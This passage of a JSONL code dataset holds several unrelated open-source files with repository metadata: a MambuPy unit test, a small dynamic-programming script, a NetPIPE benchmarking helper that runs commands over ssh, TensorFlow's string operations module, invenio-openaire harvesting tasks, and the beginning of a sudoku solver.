mambuactivity.MambuActivities(urlfunc=None)\n acs.attrs = [{\"0\": 0}, {\"1\": 1}, {\"2\": 2}]\n self.assertEqual(len(acs), 3)\n for n, a in enumerate(acs):\n self.assertEqual(str(n), [k for k in a][0])\n self.assertEqual(n, a[str(n)])\n\n def test_convert_dict_to_attrs(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n acs = mambuactivity.MambuActivities(urlfunc=None)\n acs.attrs = [\n {\"activity\": \"my_act\"},\n {\"activity\": \"my_2_act\"},\n ]\n with self.assertRaisesRegexp(\n AttributeError,\n \"'MambuActivities' object has no attribute 'mambuactivityclass'\",\n ):\n acs.mambuactivityclass\n acs.convert_dict_to_attrs()\n self.assertEqual(\n str(acs.mambuactivityclass),\n \"\",\n )\n for a in acs:\n self.assertEqual(a.__class__.__name__, \"MambuActivity\")\n self.assertEqual(a._MambuStruct__urlfunc, getactivitiesurl)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"jstitch/MambuPy","sub_path":"tests/unit_mambuactivity.py","file_name":"unit_mambuactivity.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"13859531249","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nnumber_list = [-1]+list(map(int,input().split()))\ndp = [0 for _ in range(n+1)]\n\nfor i in range(1,n+1):\n temp = -1\n for j in range(i):\n if number_list[j]\\n\", p1.communicate()[0].strip())\n \ndef runRemoteCommandOut(server, com):\n p1 = Popen([\"ssh\", server, com], stdout=PIPE)\n print(\"\\tssh \"+server, com, \"->\\n\", p1.communicate()[0].strip())\n\ndef runRemoteCommandGet(server, com):\n p1 = Popen([\"ssh\", server, com], stdout=PIPE)\n return p1.communicate()[0].strip()\n \ndef runLocalCommand(com):\n p1 = Popen(list(filter(None, com.strip().split(' '))), stdout=PIPE)\n \ndef runRemoteCommand(server, com):\n p1 = Popen([\"ssh\", server, com], stdout=PIPE)\n\ndef updateITR(ITR):\n p1 = Popen([\"ssh\", CSERVER2, \"ethtool -C enp4s0f1 rx-usecs\", str(ITR)], stdout=PIPE, stderr=PIPE)\n p1.communicate()\n time.sleep(1)\n \ndef runBench(com):\n p1 = Popen(list(filter(None, com.strip().split(' '))), stdout=PIPE, stderr=PIPE)\n stdout, stderr = p1.communicate()\n if 'Mbps' in str(stderr):\n s = str(stderr).strip().split('-->')[1]\n t = s.split('Mbps')[0]\n return float(t.strip())\n else:\n return -1.0\n\ndef runStatic(msg_size):\n runRemoteCommand(CSERVER, \"taskset -c 1 NPtcp -l \"+msg_size+\" -u \"+msg_size+\" -p 0 -r -I\")\n time.sleep(1)\n tput = runBench(\"taskset -c 1 NPtcp -h \"+CSERVER+\" -l \"+msg_size+\" -u \"+msg_size+\" -T 2 -p 0 -r -I\")\n time.sleep(0.5)\n runRemoteCommand(CSERVER, \"pkill NPtcp\")\n time.sleep(0.5)\n runLocalCommand(\"pkill NPtcp\")\n time.sleep(0.5)\n return tput\n\nsock.send(\"hi\")\nitr = sock.recv()\nif int(itr) > 0 and int(itr) < 202:\n #itr = 40\n updateITR(itr)\n msg = 10000\n tput = runStatic(str(msg))\n #print(tput)\n sock.send(str(tput))\nelse:\n \n sock.send(str(abs(int(itr)) * -9999.99))\n","repo_name":"handong32/NicFuzzer","sub_path":"netpipe2.py","file_name":"netpipe2.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4005655134","text":"import numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gen_parsing_ops\nfrom tensorflow.python.ops import gen_string_ops\nfrom tensorflow.python.ops import math_ops\n\n# go/tf-wildcard-import\n# pylint: disable=wildcard-import\n# pylint: disable=g-bad-import-order\nfrom tensorflow.python.ops.gen_string_ops import *\nfrom tensorflow.python.util import compat as util_compat\nfrom tensorflow.python.util import deprecation\nfrom tensorflow.python.util import dispatch\nfrom tensorflow.python.util.tf_export import tf_export\n# pylint: enable=g-bad-import-order\n# pylint: enable=wildcard-import\n\n\n# pylint: disable=redefined-builtin\n@tf_export(\"strings.regex_full_match\")\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef regex_full_match(input, pattern, name=None):\n r\"\"\"Match elements of `input` with regex `pattern`.\n\n Args:\n input: string `Tensor`, the source strings to process.\n pattern: string or scalar string `Tensor`, regular expression to use,\n see more details at https://github.com/google/re2/wiki/Syntax\n name: Name of the op.\n\n Returns:\n bool `Tensor` of the same shape as `input` with match results.\n \"\"\"\n if isinstance(pattern, util_compat.bytes_or_text_types):\n # When `pattern` is static through the life of the op we can\n # use a version which performs the expensive regex compilation once at\n # creation time.\n return gen_string_ops.static_regex_full_match(\n input=input, pattern=pattern, name=name)\n return gen_string_ops.regex_full_match(\n input=input, pattern=pattern, name=name)\n\nregex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__\n\n\n@tf_export(\n \"strings.regex_replace\", v1=[\"strings.regex_replace\", \"regex_replace\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\n@deprecation.deprecated_endpoints(\"regex_replace\")\ndef regex_replace(input, pattern, rewrite, replace_global=True, name=None):\n r\"\"\"Replace elements of `input` matching regex `pattern` with `rewrite`.\n\n >>> tf.strings.regex_replace(\"Text with tags.
    contains html\",\n ... \"<[^>]+>\", \" \")\n \n\n Args:\n input: string `Tensor`, the source strings to process.\n pattern: string or scalar string `Tensor`, regular expression to use,\n see more details at https://github.com/google/re2/wiki/Syntax\n rewrite: string or scalar string `Tensor`, value to use in match\n replacement, supports backslash-escaped digits (\\1 to \\9) can be to insert\n text matching corresponding parenthesized group.\n replace_global: `bool`, if `True` replace all non-overlapping matches,\n else replace only the first match.\n name: A name for the operation (optional).\n\n Returns:\n string `Tensor` of the same shape as `input` with specified replacements.\n \"\"\"\n if (isinstance(pattern, util_compat.bytes_or_text_types) and\n isinstance(rewrite, util_compat.bytes_or_text_types)):\n # When `pattern` and `rewrite` are static through the life of the op we can\n # use a version which performs the expensive regex compilation once at\n # creation time.\n return gen_string_ops.static_regex_replace(\n input=input, pattern=pattern,\n rewrite=rewrite, replace_global=replace_global,\n name=name)\n return gen_string_ops.regex_replace(\n input=input, pattern=pattern,\n rewrite=rewrite, replace_global=replace_global,\n name=name)\n\n\n@tf_export(\"strings.format\")\n@dispatch.add_dispatch_support\ndef string_format(template, inputs, placeholder=\"{}\", summarize=3, name=None):\n r\"\"\"Formats a string template using a list of tensors.\n\n Formats a string template using a list of tensors, abbreviating tensors by\n only printing the first and last `summarize` elements of each dimension\n (recursively). If formatting only one tensor into a template, the tensor does\n not have to be wrapped in a list.\n\n Example:\n Formatting a single-tensor template:\n\n >>> tensor = tf.range(5)\n >>> tf.strings.format(\"tensor: {}, suffix\", tensor)\n \n\n Formatting a multi-tensor template:\n\n >>> tensor_a = tf.range(2)\n >>> tensor_b = tf.range(1, 4, 2)\n >>> tf.strings.format(\"a: {}, b: {}, suffix\", (tensor_a, tensor_b))\n \n\n\n Args:\n template: A string template to format tensor values into.\n inputs: A list of `Tensor` objects, or a single Tensor.\n The list of tensors to format into the template string. If a solitary\n tensor is passed in, the input tensor will automatically be wrapped as a\n list.\n placeholder: An optional `string`. Defaults to `{}`.\n At each placeholder occurring in the template, a subsequent tensor\n will be inserted.\n summarize: An optional `int`. Defaults to `3`.\n When formatting the tensors, show the first and last `summarize`\n entries of each tensor dimension (recursively). If set to -1, all\n elements of the tensor will be shown.\n name: A name for the operation (optional).\n\n Returns:\n A scalar `Tensor` of type `string`.\n\n Raises:\n ValueError: if the number of placeholders does not match the number of\n inputs.\n \"\"\"\n # If there is only one tensor to format, we will automatically wrap it in a\n # list to simplify the user experience\n if tensor_util.is_tf_type(inputs):\n inputs = [inputs]\n if template.count(placeholder) != len(inputs):\n raise ValueError(f\"The template expects {template.count(placeholder)} \"\n f\"tensors, but the inputs only has {len(inputs)}. \"\n \"Please ensure the number of placeholders in template \"\n \"matches inputs length.\")\n\n return gen_string_ops.string_format(inputs,\n template=template,\n placeholder=placeholder,\n summarize=summarize,\n name=name)\n\n\n# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which\n# defines a wrapper for this function.\ndef string_split(source, sep=None, skip_empty=True, delimiter=None): # pylint: disable=invalid-name\n \"\"\"Split elements of `source` based on `delimiter` into a `SparseTensor`.\n\n Let N be the size of source (typically N will be the batch size). Split each\n element of `source` based on `delimiter` and return a `SparseTensor`\n containing the split tokens. Empty tokens are ignored.\n\n If `sep` is an empty string, each element of the `source` is split\n into individual strings, each containing one byte. (This includes splitting\n multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is\n treated as a set of delimiters with each considered a potential split point.\n\n For example:\n N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output\n will be\n\n st.indices = [0, 0;\n 0, 1;\n 1, 0;\n 1, 1;\n 1, 2]\n st.shape = [2, 3]\n st.values = ['hello', 'world', 'a', 'b', 'c']\n\n Args:\n source: `1-D` string `Tensor`, the strings to split.\n sep: `0-D` string `Tensor`, the delimiter character, the string should\n be length 0 or 1. Default is ' '.\n skip_empty: A `bool`. If `True`, skip the empty strings from the result.\n delimiter: deprecated alias for `sep`.\n\n Raises:\n ValueError: If delimiter is not a string.\n\n Returns:\n A `SparseTensor` of rank `2`, the strings split according to the delimiter.\n The first column of the indices corresponds to the row in `source` and the\n second column corresponds to the index of the split component in this row.\n \"\"\"\n delimiter = deprecation.deprecated_argument_lookup(\n \"sep\", sep, \"delimiter\", delimiter)\n\n if delimiter is None:\n delimiter = \" \"\n delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)\n source = ops.convert_to_tensor(source, dtype=dtypes.string)\n\n indices, values, shape = gen_string_ops.string_split(\n source, delimiter=delimiter, skip_empty=skip_empty)\n indices.set_shape([None, 2])\n values.set_shape([None])\n shape.set_shape([2])\n return sparse_tensor.SparseTensor(indices, values, shape)\n\n\n# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which\n# defines a wrapper for this function.\ndef string_split_v2(source, sep=None, maxsplit=-1):\n \"\"\"Split elements of `source` based on `sep` into a `SparseTensor`.\n\n Let N be the size of source (typically N will be the batch size). Split each\n element of `source` based on `sep` and return a `SparseTensor`\n containing the split tokens. Empty tokens are ignored.\n\n For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',\n then the output will be\n\n st.indices = [0, 0;\n 0, 1;\n 1, 0;\n 1, 1;\n 1, 2]\n st.shape = [2, 3]\n st.values = ['hello', 'world', 'a', 'b', 'c']\n\n If `sep` is given, consecutive delimiters are not grouped together and are\n deemed to delimit empty strings. For example, source of `\"1<>2<><>3\"` and\n sep of `\"<>\"` returns `[\"1\", \"2\", \"\", \"3\"]`. If `sep` is None or an empty\n string, consecutive whitespace are regarded as a single separator, and the\n result will contain no empty strings at the start or end if the string has\n leading or trailing whitespace.\n\n Note that the above mentioned behavior matches python's str.split.\n\n Args:\n source: `1-D` string `Tensor`, the strings to split.\n sep: `0-D` string `Tensor`, the delimiter character.\n maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result.\n\n Raises:\n ValueError: If sep is not a string.\n\n Returns:\n A `SparseTensor` of rank `2`, the strings split according to the delimiter.\n The first column of the indices corresponds to the row in `source` and the\n second column corresponds to the index of the split component in this row.\n \"\"\"\n if sep is None:\n sep = \"\"\n sep = ops.convert_to_tensor(sep, dtype=dtypes.string)\n source = ops.convert_to_tensor(source, dtype=dtypes.string)\n\n indices, values, shape = gen_string_ops.string_split_v2(\n source, sep=sep, maxsplit=maxsplit)\n indices.set_shape([None, 2])\n values.set_shape([None])\n shape.set_shape([2])\n return sparse_tensor.SparseTensor(indices, values, shape)\n\n\ndef _reduce_join_reduction_dims(x, axis):\n \"\"\"Returns range(rank(x) - 1, 0, -1) if axis is None; or axis otherwise.\"\"\"\n if axis is not None:\n return axis\n else:\n # Fast path: avoid creating Rank and Range ops if ndims is known.\n if x.get_shape().ndims is not None:\n return constant_op.constant(\n np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)\n\n # Otherwise, we rely on Range and Rank to do the right thing at run-time.\n return math_ops.range(array_ops.rank(x) - 1, -1, -1)\n\n\n@tf_export(v1=[\"strings.reduce_join\", \"reduce_join\"])\n@dispatch.add_dispatch_support\n@deprecation.deprecated_args(None,\n \"keep_dims is deprecated, use keepdims instead\",\n \"keep_dims\")\n@deprecation.deprecated_endpoints(\"reduce_join\")\ndef reduce_join(inputs, axis=None, # pylint: disable=missing-docstring\n keep_dims=None,\n separator=\"\",\n name=None,\n reduction_indices=None,\n keepdims=None):\n keepdims = deprecation.deprecated_argument_lookup(\"keepdims\", keepdims,\n \"keep_dims\", keep_dims)\n if keep_dims is None:\n keep_dims = False\n axis = deprecation.deprecated_argument_lookup(\"axis\", axis,\n \"reduction_indices\",\n reduction_indices)\n return reduce_join_v2(\n inputs=inputs,\n axis=axis,\n keepdims=keepdims,\n separator=separator,\n name=name)\n\n\n@tf_export(\"strings.reduce_join\", v1=[])\n@dispatch.add_dispatch_support\ndef reduce_join_v2( # pylint: disable=missing-docstring\n inputs,\n axis=None,\n keepdims=False,\n separator=\"\",\n name=None):\n \"\"\"Joins all strings into a single string, or joins along an axis.\n\n This is the reduction operation for the elementwise `tf.strings.join` op.\n\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']]).numpy()\n b'abc123def456'\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']], axis=-1).numpy()\n array([b'abc123', b'def456'], dtype=object)\n >>> tf.strings.reduce_join([['abc','123'],\n ... ['def','456']],\n ... axis=-1,\n ... separator=\" \").numpy()\n array([b'abc 123', b'def 456'], dtype=object)\n\n Args:\n inputs: A `tf.string` tensor.\n axis: Which axis to join along. The default behavior is to join all\n elements, producing a scalar.\n keepdims: If true, retains reduced dimensions with length 1.\n separator: a string added between each string being joined.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor.\n \"\"\"\n with ops.name_scope(None, \"ReduceJoin\", [inputs, axis]):\n inputs_t = ops.convert_to_tensor(inputs)\n axis = _reduce_join_reduction_dims(inputs_t, axis)\n return gen_string_ops.reduce_join(\n inputs=inputs_t,\n reduction_indices=axis,\n keep_dims=keepdims,\n separator=separator,\n name=name)\n\nreduce_join.__doc__ = reduce_join_v2.__doc__\n\n\n# This wrapper provides backwards compatibility for code that predates the\n# unit argument and that passed 'name' as a positional argument.\n@tf_export(v1=[\"strings.length\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_length(input, name=None, unit=\"BYTE\"):\n \"\"\"Computes the length of each string given in the input tensor.\n\n >>> strings = tf.constant(['Hello','TensorFlow', '🙂'])\n >>> tf.strings.length(strings).numpy() # default counts bytes\n array([ 5, 10, 4], dtype=int32)\n >>> tf.strings.length(strings, unit=\"UTF8_CHAR\").numpy()\n array([ 5, 10, 1], dtype=int32)\n\n Args:\n input: A `Tensor` of type `string`. The strings for which to compute the\n length for each element.\n name: A name for the operation (optional).\n unit: An optional `string` from: `\"BYTE\", \"UTF8_CHAR\"`. Defaults to\n `\"BYTE\"`. The unit that is counted to compute string length. One of:\n `\"BYTE\"` (for the number of bytes in each string) or `\"UTF8_CHAR\"` (for\n the number of UTF-8 encoded Unicode code points in each string). Results\n are undefined if `unit=UTF8_CHAR` and the `input` strings do not contain\n structurally valid UTF-8.\n\n Returns:\n A `Tensor` of type `int32`, containing the length of the input string in\n the same element of the input tensor.\n \"\"\"\n return gen_string_ops.string_length(input, unit=unit, name=name)\n\n\n@tf_export(\"strings.length\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_length_v2(input, unit=\"BYTE\", name=None):\n return gen_string_ops.string_length(input, unit=unit, name=name)\n\n\nstring_length_v2.__doc__ = gen_string_ops.string_length.__doc__\n\n\n@tf_export(v1=[\"substr\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\n@deprecation.deprecated(None, \"Use `tf.strings.substr` instead of `tf.substr`.\")\ndef substr_deprecated(input, pos, len, name=None, unit=\"BYTE\"):\n return substr(input, pos, len, name=name, unit=unit)\n\nsubstr_deprecated.__doc__ = gen_string_ops.substr.__doc__\n\n\n@tf_export(v1=[\"strings.substr\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef substr(input, pos, len, name=None, unit=\"BYTE\"):\n return gen_string_ops.substr(input, pos, len, unit=unit, name=name)\n\nsubstr.__doc__ = gen_string_ops.substr.__doc__\n\n\n@tf_export(\"strings.substr\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef substr_v2(input, pos, len, unit=\"BYTE\", name=None):\n return gen_string_ops.substr(input, pos, len, unit=unit, name=name)\n\nsubstr_v2.__doc__ = gen_string_ops.substr.__doc__\n\n\nops.NotDifferentiable(\"RegexReplace\")\nops.NotDifferentiable(\"StringToHashBucket\")\nops.NotDifferentiable(\"StringToHashBucketFast\")\nops.NotDifferentiable(\"StringToHashBucketStrong\")\nops.NotDifferentiable(\"ReduceJoin\")\nops.NotDifferentiable(\"StringJoin\")\nops.NotDifferentiable(\"StringSplit\")\nops.NotDifferentiable(\"AsString\")\nops.NotDifferentiable(\"EncodeBase64\")\nops.NotDifferentiable(\"DecodeBase64\")\n\n\n@tf_export(\"strings.to_number\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_number(input, out_type=dtypes.float32, name=None):\n r\"\"\"Converts each string in the input Tensor to the specified numeric type.\n\n (Note that int32 overflow results in an error while float overflow\n results in a rounded value.)\n\n Examples:\n\n >>> tf.strings.to_number(\"1.55\")\n \n >>> tf.strings.to_number(\"3\", tf.int32)\n \n\n Args:\n input: A `Tensor` of type `string`.\n out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32,\n tf.int64`. Defaults to `tf.float32`.\n The numeric type to interpret each string in `string_tensor` as.\n name: A name for the operation (optional).\n\n Returns:\n A `Tensor` of type `out_type`.\n \"\"\"\n return gen_parsing_ops.string_to_number(input, out_type, name)\n\n\n@tf_export(v1=[\"strings.to_number\", \"string_to_number\"])\n@dispatch.add_dispatch_support\ndef string_to_number_v1(\n string_tensor=None,\n out_type=dtypes.float32,\n name=None,\n input=None):\n string_tensor = deprecation.deprecated_argument_lookup(\n \"input\", input, \"string_tensor\", string_tensor)\n return gen_parsing_ops.string_to_number(string_tensor, out_type, name)\n\nstring_to_number_v1.__doc__ = gen_parsing_ops.string_to_number.__doc__\n\n\n@tf_export(\"strings.to_hash_bucket\", v1=[])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_hash_bucket(input, num_buckets, name=None):\n # pylint: disable=line-too-long\n r\"\"\"Converts each string in the input Tensor to its hash mod by a number of buckets.\n\n The hash function is deterministic on the content of the string within the\n process.\n\n Note that the hash function may change from time to time.\n This functionality will be deprecated and it's recommended to use\n `tf.strings.to_hash_bucket_fast()` or `tf.strings.to_hash_bucket_strong()`.\n\n Examples:\n\n >>> tf.strings.to_hash_bucket([\"Hello\", \"TensorFlow\", \"2.x\"], 3)\n \n\n Args:\n input: A `Tensor` of type `string`.\n num_buckets: An `int` that is `>= 1`. The number of buckets.\n name: A name for the operation (optional).\n\n Returns:\n A `Tensor` of type `int64`.\n \"\"\"\n # pylint: enable=line-too-long\n return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)\n\n\n@tf_export(v1=[\"strings.to_hash_bucket\", \"string_to_hash_bucket\"])\n@dispatch.register_unary_elementwise_api\n@dispatch.add_dispatch_support\ndef string_to_hash_bucket_v1( # pylint: disable=missing-function-docstring\n string_tensor=None,\n num_buckets=None,\n name=None,\n input=None):\n string_tensor = deprecation.deprecated_argument_lookup(\n \"input\", input, \"string_tensor\", string_tensor)\n return gen_string_ops.string_to_hash_bucket(string_tensor, num_buckets, name)\n\nstring_to_hash_bucket_v1.__doc__ = gen_string_ops.string_to_hash_bucket.__doc__\n\n\n@tf_export(\"strings.join\", v1=[\"strings.join\", \"string_join\"])\n@dispatch.add_dispatch_support\n@deprecation.deprecated_endpoints(\"string_join\")\ndef string_join(inputs, separator=\"\", name=None):\n \"\"\"Perform element-wise concatenation of a list of string tensors.\n\n Given a list of string tensors of same shape, performs element-wise\n concatenation of the strings of the same index in all tensors.\n\n\n >>> tf.strings.join(['abc','def']).numpy()\n b'abcdef'\n >>> tf.strings.join([['abc','123'],\n ... ['def','456'],\n ... ['ghi','789']]).numpy()\n array([b'abcdefghi', b'123456789'], dtype=object)\n >>> tf.strings.join([['abc','123'],\n ... ['def','456']],\n ... separator=\" \").numpy()\n array([b'abc def', b'123 456'], dtype=object)\n\n The reduction version of this elementwise operation is\n `tf.strings.reduce_join`\n\n Args:\n inputs: A list of `tf.Tensor` objects of same size and `tf.string` dtype.\n separator: A string added between each string being joined.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor.\n \"\"\"\n return gen_string_ops.string_join(inputs, separator=separator, name=name)\n\n\n@tf_export(\"strings.unsorted_segment_join\")\n@dispatch.add_dispatch_support\ndef unsorted_segment_join(inputs,\n segment_ids,\n num_segments,\n separator=\"\",\n name=None):\n \"\"\"Joins the elements of `inputs` based on `segment_ids`.\n\n Computes the string join along segments of a tensor.\n\n Given `segment_ids` with rank `N` and `data` with rank `N+M`:\n\n ```\n output[i, k1...kM] = strings.join([data[j1...jN, k1...kM])\n ```\n\n where the join is over all `[j1...jN]` such that `segment_ids[j1...jN] = i`.\n\n Strings are joined in row-major order.\n\n For example:\n\n >>> inputs = ['this', 'a', 'test', 'is']\n >>> segment_ids = [0, 1, 1, 0]\n >>> num_segments = 2\n >>> separator = ' '\n >>> tf.strings.unsorted_segment_join(inputs, segment_ids, num_segments,\n ... separator).numpy()\n array([b'this is', b'a test'], dtype=object)\n\n >>> inputs = [['Y', 'q', 'c'], ['Y', '6', '6'], ['p', 'G', 'a']]\n >>> segment_ids = [1, 0, 1]\n >>> num_segments = 2\n >>> tf.strings.unsorted_segment_join(inputs, segment_ids, num_segments,\n ... separator=':').numpy()\n array([[b'Y', b'6', b'6'],\n [b'Y:p', b'q:G', b'c:a']], dtype=object)\n\n Args:\n inputs: A list of `tf.Tensor` objects of type `tf.string`.\n segment_ids: A tensor whose shape is a prefix of `inputs.shape` and whose\n type must be `tf.int32` or `tf.int64`. Negative segment ids are not\n supported.\n num_segments: A scalar of type `tf.int32` or `tf.int64`. Must be\n non-negative and larger than any segment id.\n separator: The separator to use when joining. Defaults to `\"\"`.\n name: A name for the operation (optional).\n\n Returns:\n A `tf.string` tensor representing the concatenated values, using the given\n separator.\n \"\"\"\n return gen_string_ops.unsorted_segment_join(\n inputs, segment_ids, num_segments, separator=separator, name=name)\n\n\n# Register elementwise ops that don't have Python wrappers.\ndispatch.register_unary_elementwise_api(gen_string_ops.as_string)\ndispatch.register_unary_elementwise_api(gen_string_ops.decode_base64)\ndispatch.register_unary_elementwise_api(gen_string_ops.encode_base64)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_lower)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_upper)\ndispatch.register_unary_elementwise_api(gen_string_ops.unicode_transcode)\ndispatch.register_unary_elementwise_api(gen_string_ops.string_strip)\ndispatch.register_unary_elementwise_api(\n gen_string_ops.string_to_hash_bucket_fast)\ndispatch.register_unary_elementwise_api(\n gen_string_ops.string_to_hash_bucket_strong)\ndispatch.register_unary_elementwise_api(gen_string_ops.unicode_script)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/ops/string_ops.py","file_name":"string_ops.py","file_ext":"py","file_size_in_byte":23982,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"71081560999","text":"from __future__ import absolute_import, print_function\n\nfrom copy import deepcopy\n\nfrom celery import chain, shared_task\nfrom flask import current_app\nfrom invenio_db import db\nfrom invenio_indexer.api import RecordIndexer\nfrom invenio_pidstore.errors import PIDDoesNotExistError\nfrom invenio_pidstore.resolver import Resolver\nfrom invenio_records.api import Record\n\nfrom .loaders import LocalFundRefLoader, LocalOAIRELoader, \\\n RemoteFundRefLoader, RemoteOAIRELoader\nfrom .minters import funder_minter, grant_minter\n\n\n@shared_task(ignore_result=True)\ndef harvest_fundref(source=None):\n \"\"\"Harvest funders from FundRef and store as authority records.\"\"\"\n loader = LocalFundRefLoader(source=source) if source \\\n else RemoteFundRefLoader()\n for funder_json in loader.iter_funders():\n register_funder.delay(funder_json)\n\n\n@shared_task(ignore_result=True)\ndef harvest_openaire_projects(source=None, setspec=None):\n \"\"\"Harvest grants from OpenAIRE and store as authority records.\"\"\"\n loader = LocalOAIRELoader(source=source) if source \\\n else RemoteOAIRELoader(setspec=setspec)\n for grant_json in loader.iter_grants():\n register_grant.delay(grant_json)\n\n\n@shared_task(ignore_result=True)\ndef harvest_all_openaire_projects():\n \"\"\"Reharvest all grants from OpenAIRE.\n\n Harvest all OpenAIRE grants in a chain to prevent OpenAIRE\n overloading from multiple parallel harvesting.\n \"\"\"\n setspecs = current_app.config['OPENAIRE_GRANTS_SPECS']\n chain(harvest_openaire_projects.s(setspec=setspec)\n for setspec in setspecs).apply_async()\n\n\n@shared_task(ignore_result=True)\ndef register_funder(data):\n \"\"\"Register the funder JSON in records and create a PID.\"\"\"\n create_or_update_record(data, 'frdoi', 'doi', funder_minter)\n\n\n@shared_task(ignore_result=True, rate_limit='20/s')\ndef register_grant(data):\n \"\"\"Register the grant JSON in records and create a PID.\"\"\"\n create_or_update_record(data, 'grant', 'internal_id', grant_minter)\n\n\ndef create_or_update_record(data, pid_type, id_key, minter):\n \"\"\"Register a funder or grant.\"\"\"\n resolver = Resolver(\n pid_type=pid_type, object_type='rec', getter=Record.get_record)\n\n try:\n pid, record = resolver.resolve(data[id_key])\n data_c = deepcopy(data)\n del data_c['remote_modified']\n record_c = deepcopy(record)\n del record_c['remote_modified']\n # All grants on OpenAIRE are modified periodically even if nothing\n # has changed. We need to check for actual differences in the metadata\n if data_c != record_c:\n record.update(data)\n record.commit()\n record_id = record.id\n db.session.commit()\n RecordIndexer().index_by_id(str(record_id))\n except PIDDoesNotExistError:\n record = Record.create(data)\n record_id = record.id\n minter(record.id, data)\n db.session.commit()\n RecordIndexer().index_by_id(str(record_id))\n","repo_name":"inveniosoftware/invenio-openaire","sub_path":"invenio_openaire/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"16094334906","text":"from math import *\r\n#from random import *\r\nimport time\r\n\r\nnmbrs = [int(1), int(2), int(3), int(4), int(5), int(6), int(7), int(8), int(9)]\r\n\r\n# Reading the document + transforming into lists\r\nwith open('sudoku.txt', 'r') as f:\r\n lines = f.read()\r\n newlines = lines.rstrip()\r\n\r\ny = []\r\nfor i in range(0, 9):\r\n x = []\r\n for j in range(0, 9):\r\n x.append(int(newlines[j + (10 * i)]))\r\n y.append(x)\r\n\r\n# Printing sudoku input\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\nprint('The input is:')\r\nprint(\r\n)\r\nprint(*y, sep='\\n')\r\nprint(\r\n)\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\n# Sector generation (0 downto 8 from left to right, up to down):\r\nsectors = []\r\nh = []\r\nv = []\r\nfor k in range(0, 9):\r\n v = []\r\n h = []\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n if k <= 2:\r\n h.append(y[i][j + (3 * k)])\r\n if (k == 3) or (k == 4) or (k == 5):\r\n h.append(y[i + 3][j + (3 * (k - 3))])\r\n if (k == 6) or (k == 7) or (k == 8):\r\n h.append(y[i + 6][j + (3 * (k - 6))])\r\n sectors.append(h)\r\n\r\n# Column generation (col list, 0 downto 8 from left to right):\r\ncol = []\r\nfor i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(y[j][i])\r\n col.append(n)\r\n\r\n\r\ndef colgen(z): ##Column update using str:\r\n col = []\r\n for i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(z[j * 9 + i])\r\n col.append(n)\r\n return col\r\n\r\n\r\ndef rowgen(z): # Row update using str:\r\n y = []\r\n for i in range(0, 9):\r\n n = []\r\n for j in range(0, 9):\r\n n.append(z[j + 9 * i])\r\n y.append(n)\r\n return y\r\n\r\n\r\n# Sudoku string-shaped (0 downto 80, left to right, up to down):\r\nstr = []\r\nfor i in range(0, 9):\r\n for j in range(0, 9):\r\n str.append(y[i][j])\r\n\r\n# Validity indicator, to remember original sudoku numbers (0 = to change, 1 = fixed):\r\nval = []\r\nfor i in range(0, 81):\r\n if str[i] == 0:\r\n val.append(int(0))\r\n else:\r\n val.append(int(1))\r\n\r\n# sector in string form (0 downto 80, ranging from 0 to 8):\r\nsl = [0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 0, 0, 0, 1, 1, 1, 2, 2, 2,\r\n 3, 3, 3, 4, 4, 4, 5, 5, 5,\r\n 3, 